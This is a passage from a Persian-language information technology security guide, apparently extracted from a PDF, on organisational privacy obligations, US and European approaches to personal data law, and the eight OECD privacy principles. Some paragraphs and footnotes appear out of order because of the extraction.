‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﺍﻳــﻦ ﻓــﺼﻞ ﻣــﺮﻭﺭﻱ ﺧــﻮﺍﻫﻴﻢ ﺩﺍﺷــﺖ ﺑــﺮ ﻧﺤــﻮﺓ ﺗــﺪﻭﻳﻦ‬
‫ﻲ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻋﻤـﻮﻣ ﹺ‬
‫ﺩﻭﻟﺘﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ‪ .‬ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺧـﻮﺍﻫﻴﻢ ﺩﻳـﺪ ﺍﺯ‬
‫ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺷﻬﺮﻭﻧﺪﺍﻥ‪ ،‬ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻛﻮﺩﻛـﺎﻥ ﺍﺯ‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻣﻄﺎﻟﺐ ﻏﻴﺮﺍﺧﻼﻗـﻲ‪ .‬ﺩﺭ ﺑﺨـﺶ‬
‫‪١١٥‬‬
‫ﭼﻬﺎﺭﻡ ﺑﺤﺚ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﻣﻄﺮﺡ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺗﺄﻛﻴﺪ ﻣﺎ ﺑﻴﺸﺘﺮ ﺭﻭﻱ ﻣﺴﺌﻮﻟﻴﺖ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻓﻀﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺳﺖ‪.‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﺑﻪ ﺗﺠـﺎﺭﺕ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﺩﺭ‬
‫ﺭﺍﺑﻄﻪ ﺑﺎ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﻜـﺎﻥ ﺗـﺸﺨﻴﺺ ﻫﻮﻳـﺖ ﻭ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣـﻲﺁﻭﺭﺩ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ‬
‫ﺗﺒﻌﻴﺖ ﻛﻨﻨﺪ؟‬
‫‪١٧٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺍﻃـﻼﻉ‬
‫ﭘﻴﺪﺍ ﻛﻨﺪ ﻛﻪ ﭼﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﻣﻲﺷﻮﺩ‬
‫ﻭ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫•‬
‫ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ‬
‫ﺑﻜﺎﺭ ﺭﻓﺘﻦ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺩﺭ ﺍﻫـﺪﺍﻓﻲ ﻏﻴـﺮ ﺍﺯ‬
‫ﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﻼﻡ ﺷﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺧﻮﺩ ﻓﺮﺩ ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﺻـﻼﺡ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ ﺍﻭ‬
‫ﻛﻪ ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﻭﻱ ﻣﻲﺷﻮﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﻫﺮ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺭﺍ‬
‫ﺗﻬﻴﻪ‪ ،‬ﻧﮕﻬﺪﺍﺭﻱ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﭘﺨﺶ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺩﻩ ﻫﺎ ﺩﺭ‬
‫ﻛﺎﺭﺑﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺗـﻀﻤﻴﻦ ﻧﻤﺎﻳـﺪ ﻭ ﺍﺯ ﻣـﻮﺭﺩ ﺳـﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪.‬‬
‫ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻪ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺷﺨﺼﻲ ﺭﺍ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻣﻲﻛـﺮﺩ ﺍﺩﺍﻣـﻪ ﺩﺍﺩ‪ .‬ﺑـﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ‪،‬‬
‫ﻦ‬
‫ﺳﻮﺍﺑﻖ ﺑﺎﻧﻜﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﺗﻠﻔﻦ‪ ،‬ﺳﻮﺍﺑﻖ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺳﻮﺍﺑﻖ ﻣـﺸﺘﺮﻛﻴ ﹺ‬
‫ﺗﻠﻮﻳﺰﻳﻮﻥ ﻛﺎﺑﻠﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﺑﻬﺪﺍﺷـﺘﻲ‪ ،‬ﺳـﻮﺍﺑﻖ ﺗﺤـﺼﻴﻠﻲ ﻭ ﺣﺘـﻲ‬
‫ﺳﻮﺍﺑﻖ ﺍﺟﺎﺭﺓ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳـﺪﺋﻮﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺗﺤـﺖ ﭘﻮﺷـﺶ‬
‫ﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭﺁﻣﺪﻧﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﻫـﺮ ﺟـﺰﺀ‬
‫ﻗﺎﻧﻮﻥ ﻛﻨﮕﺮﻩﺍ ﹺ‬
‫ﻗﺎﻧﻮﻥ ﺣﻔﺎﻇﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺍﻳﺠـﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺗﻮﺳـﻂ ﺑﺨـﺶ‬
‫ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻧﻴﺮﻭﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺟﺮﺍﺋﻢ ﻣﺜـﻞ‬
‫ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣﺔ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣـﺸﺘﺮﻛﻴﻦ ﺗﻠﻔـﻦ ﻭ‬
‫ﺩﻭﺭﻧﮕﺎﺭ‪ ١١٩‬ﻣﻲﮔﻨﺠﺪ‪ ،‬ﺑﺪﻭﻥ ﺷـﻜﺎﻳﺖ ﺷـﺎﻛﻲ ﺧـﺼﻮﺻﻲ ﻗﺎﺑـﻞ‬
‫ﭘﻴﮕﺮﺩ ﻧﺒﻮﺩﻧﺪ‪ .‬ﺍﻣﺎ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺎﺋﻞ ﻃﻮﺭ ﺩﻳﮕـﺮﻱ ﺑـﻮﺩ‪ .‬ﺑـﺮ ﭘﺎﻳـﺔ‬
‫ﺗﺠﺮﺑــﺔ ﺟﻨــﮓ ﺩﻭﻡ ﺟﻬــﺎﻧﻲ ﻛــﻪ ﺩﺭ ﺁﻥ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺷﺨﺼﻲ ﺗﻮﺳﻂ ﻧﺎﺯﻳﻬﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ‪ ،‬ﺑﻴـﺸﺘﺮ‬
‫ﺩﻭ‪‬ﻝ ﺍﺭﻭﭘﺎﻳﻲ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻧﺪ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ‬
‫ﻛﺮﺩﻥ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺭﻭﭘﺎﻳﻴﺎﻥ ﺍﻳﺪﻩﻫﺎﻱ ﻣﻄﺮﺡ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺑﺎﺯﺍﺭ ﺭﺍ ﺑﻪ ﻳﻚ ﻧﻈﺎ ﹺﻡ ﻛﻠﻲ ﻣﻮﺳﻮﻡ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ‪ ١٢٠‬ﺗﻌﻤـﻴﻢ‬
‫ﺩﺍﺩﻧﺪ‪.‬‬
‫‪119 Antijunk-Fax Telephone Consumer Privacy‬‬
‫‪Act‬‬
‫‪120 Data Protection‬‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ‬
‫ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ‬
‫ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﻪ ﺍﻗﺘـﺼﺎﺩﻱ )‪ ١٢١(OECD‬ﺩﺭ ﺳـﺎﻝ‬
‫‪ ۱۹۸۰‬ﻳﻚ ﺭﺷﺘﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺖ ﻭ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪ .‬ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ‬
‫ﺿﻮﺍﺑﻂ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﻄﻮﺭ ﺧـﺎﺹ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ‬
‫ﺑﻮﺩﻧﺪ ﺗﺎ ﺑﻪ ﻣـﺸﻜﻼﺕ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﺟﺮﻳـﺎﻥ ﻓﺮﺍﻣـﺮﺯﻱ ﺩﺍﺩﻩﻫـﺎ ‪-‬‬
‫ﺣﺮﻛﺖ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺩﺭ‬
‫ﺁﻥ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺑﻪ ﻛـﺸﻮﺭﻱ ﺩﻳﮕـﺮ ﻛـﻪ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺩﺭ ﺁﻥ ﺍﺯ ﺣﻔﺎﻇـﺖ ﻛﻤﺘـﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ ‪-‬‬
‫ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ .‬ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ ‪ OECD‬ﺩﺭ ﻣــﻮﺭﺩ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺮﻳﻢ‬
‫ﺧﺼﻮﺻﻲ ﻭ ﺟﺮﻳﺎﻥ ﻓﺮﺍﻣﺮﺯﻱ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻫـﺸﺖ ﺍﺻـﻞ ﺗـﺸﻜﻴﻞ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺟﻤﻊﺁﻭﺭﻱ‬
‫‪١٢٢‬‬
‫ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻣﺤﺪﻭﺩﻳﺖ ﻭﺟﻮﺩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻫﺮ ﺩﺍﺩﺓ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ‬
‫ﻗــﺎﻧﻮﻧﻲ ﻭ ﻣﻨــﺼﻔﺎﻧﻪ‪ ،‬ﺩﺭ ﺷــﺮﺍﻳﻂ ﺩﺭﺳــﺖ‪ ،‬ﻭ ﺑــﺎ ﺩﺍﻧــﺶ ﻭ‬
‫ﺭﺿﺎﻳﺖ ﻓﺮﺩﻱ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺍﻭ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﺩ ﺑﺪﺳﺖ‬
‫ﺑﻴﺎﻳﺪ‪.‬‬
‫ﺍﺻﻞ ﻛﻴﻔﻴﺖ ﺩﺍﺩﻩﻫﺎ‬
‫‪١٢٣‬‬
‫ﻲ ﺟﻤﻊﺁﻭﺭﻱﺷﺪﻩ ﺑﺎﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﻫـﺪﻓﻲ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼ ﹺ‬
‫ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﻋﻼﻡ ﺷﺪﻩ ﻭ ﻳﺎ ﺣﻮﺯﻩ‪-‬‬
‫ﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﻫﺪﻑ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﻗﻴـﻖ‪،‬‬
‫ﻛﺎﻣﻞ‪ ،‬ﻭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﺻﻞ ﺗﻌﺮﻳﻒ ﻫﺪﻑ‬
‫‪١٢٤‬‬
‫ﻫﺪﻑ ﺍﺯ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺑﺎﻳـﺪ ﺩﺭ ﻫﻤـﺎﻥ‬
‫ﻟﺤﻈﺔ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﻧﻪ ﺩﻳﺮﺗﺮ ﺍﺯ ﺁﻥ ﻣﺸﺨﺺ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺟﻤﻊﺁﻭﺭﻱﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻫﻤﺎﻥ ﺍﻫﺪﺍﻑ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ؛ ﻭ ﺍﮔـﺮ ﻫـﺪﻓﻬﺎﻱ ﺑﻌـﺪﻱ ﺑـﺎ‬
‫ﺍﻫﺪﺍﻑ ﺍﻭﻟﻴﻪ ﺳﺎﺯﮔﺎﺭﻱ ﻧﺪﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺍﻫـﺪﺍﻑ ﺭﺍ‬
‫& ‪121 Organization for Economic Cooperation‬‬
‫‪Development‬‬
‫‪122 Collection Limitation Principle‬‬
‫‪123 Data Quality Principle‬‬
‫‪124 Purpose Specification Principle‬‬
‫‪١٧٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺻﺮﺍﺣﺘﹰﺎ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻭ ﻧﻴـﺰ ﺍﻋـﻼﻡ ﺭﺿـﺎﻳﺖ ﻓـﺮﺩ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻭﻱ ﺩﺭ ﺍﻫﺪﺍﻑ ﺟﺪﻳﺪ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪.‬‬
‫ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ‬
‫‪١٢٥‬‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳﺪ ﺍﻓﺸﺎ ﺷـﻮﻧﺪ‪ ،‬ﺩﺭ ﺩﺳـﺘﺮﺱ ﻋﻤـﻮﻡ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ،‬ﻳﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﻏﻴﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﺍﻋﻼﻡ ﺷـﺪﻩ‬
‫ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﺻﻮﻝ ﻗﺒﻞ ﮔﻔﺘـﻪ ﺷـﺪ ‪ -‬ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ‪،‬‬‫ﻣﮕﺮ‪:‬‬
‫ﻱ ﻣﺎﻟﻚ ﺍﻃﻼﻋﺎﺕ؛ ﻳﺎ‬
‫‪ o‬ﺑﺎ ﺭﺿﺎﻳﺖ ﻓﺮﺩ ﹺ‬
‫‪ o‬ﺑﺎ ﻳﻚ ﻣﺠﻮﺯ ﻗﺎﻧﻮﻧﻲ‪.‬‬
‫ﺍﺻﻞ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫‪١٢٦‬‬
‫ﺍﺻﻞ ﺑﺎﺯ ﺑﻮﺩﻥ‬
‫ﺍﺻﻞ ﭘﺎﺳﺨﮕﻮﻳﻲ‬
‫‪١٢٩‬‬
‫ﻫﺮ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺩﺭ ﻗﺒـﺎﻝ ﻋﻤـﻞ ﺑـﻪ ﺍﺻـﻮﻝ‬
‫ﺫﻛﺮﺷﺪﺓ ﺑﺎﻻ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ‪ OECD‬ﺍﺟﺒﺎﺭ ﻗﺎﻧﻮﻥ ﺑﻪ ﭼﺸﻢ ﻧﻤﻲﺧـﻮﺭﺩ‪ ،‬ﺍﻣـﺎ‬
‫ﺩﺭ ﻋﻮﺽ ﻫﻨﮕﺎﻡ ﺑﺮﺭﺳﻲ ﻗﻮﺍﻧﻴﻦ ﻫﺮﻳﻚ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ‪ ،‬ﺍﺯ‬
‫ﺍﻳﻦ ﻫﺸﺖ ﺍﺻﻞ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺳـﺎﺩﻩ ﺩﺭ ﻣـﻮﺭﺩ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﻭﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ ‪-‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪١٢٧‬‬
‫ﺑﺎﻳﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺩﺭﺑﺎﺭﺓ ﺷـﻔﺎﻑ ﺑـﻮﺩﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎ ﻧﮕﺎﻩ ﺧﺎﺹ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ‬
‫ﺑﺎﺷﺪ‪ .‬ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﻃﺒﻴﻌﺖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ‪ ،‬ﻫﺪﻑ ﺍﺻﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﺪﺕ ﻣﺘﻌﺎﺭﻑ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﻌﻴﻦ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺻﻞ ﻣﺸﺎﺭﻛﺖ ﻓﺮﺩﻱ‬
‫‪١٢٨‬‬
‫ﻫﺮ ﻛﺴﻲ ﺑﺎﻳﺪ ﺍﻳﻦ ﺣﻖ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ‪:‬‬
‫‪o‬‬
‫ﺑﻔﻬﻤــﺪ ﺍﻃﻼﻋــﺎﺗﻲ ﺍﺯ ﻭﻱ ﺩﺭ ﺩﺳــﺖ ﮔﺮﺩﺁﻭﺭﻧــﺪﺓ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ؛‬
‫‪ o‬ﺑﺎ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺧـﻮﺩ‪ :‬ﺩﺭ ﻳـﻚ‬
‫ﺯﻣﺎﻥ ﻣﻌﻘﻮﻝ‪ ،‬ﺑﺎ ﻫﺰﻳﻨﻪ ﺍﻱ ﺍﺭﺯﺍﻥ‪ ،‬ﺑﺎ ﺭﻭﺷﻲ ﻣﻌﻘﻮﻝ‪،‬‬
‫ﻭ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻳﺶ ﺷـﻔﺎﻑ ﺑﺎﺷـﺪ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﺪ؛‬
‫‪ o‬ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﺑـﺎﻻ ﺭﺩ ﺷـﺪ ﺑـﺮﺍﻱ ﺁﻥ‬
‫ﺩﻟﻴﻞ ﺑﺨﻮﺍﻫﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻪ ﭼﺎﻟﺶ ﺑﻜﺸﺪ؛ ﻭ‬
‫‪Use Limitation Principle‬‬
‫‪Security Safeguards Principle‬‬
‫‪Openness Principle‬‬
‫‪Individual Participation Principle‬‬
‫‪125‬‬
‫‪126‬‬
‫‪127‬‬
‫‪128‬‬
‫‪129 Accountalility Principle‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺗﻲ ﺍﺯ ﻗﺒﻴﻞ ﻧﺎﻗﺺ ﺷﺪﻥ‪ ،‬ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺗﺨﺮﻳﺐ‪،‬‬
‫ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻓﺸﺎ‪ ،‬ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺮﺍﻗﺒﺖ ﺷﻮﻧﺪ‪.‬‬
